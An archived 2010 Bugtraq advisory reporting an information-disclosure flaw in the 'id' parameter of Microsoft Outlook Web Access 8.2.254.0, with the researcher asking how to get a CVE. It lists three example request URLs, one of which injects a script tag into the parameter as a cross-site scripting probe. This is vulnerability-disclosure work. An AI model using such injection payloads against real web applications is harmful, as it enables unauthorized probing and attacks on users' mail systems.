| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201005202134.o4KLYEnR009344@www3.securityfocus.com>
Date: Thu, 20 May 2010 15:34:14 -0600
From: praveen_recker@...y.com
To: bugtraq@...urityfocus.com
Subject: Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter
Information Disclosure Vulnerability
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
"Microsoft Outlook Web Access (OWA) version 8.2.254.0"
OS: Windows Server 2003
Internet Explorer 7
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
There is an information disclosure vulnerability in "Microsoft Outlook Web Access (OWA) version 8.2.254.0".
The issue is with the id parameter.
Following are different exploitation techniques:
https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script>
https://example.com/owa/?ae=Folder&t=IPF.Note&id=
https://example.com/owa/?ae=Folder&t=IPF.Note&id=A
Whom to contact to get a CVE Identifier for this vulnerability.
Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA
Powered by blists - more mailing lists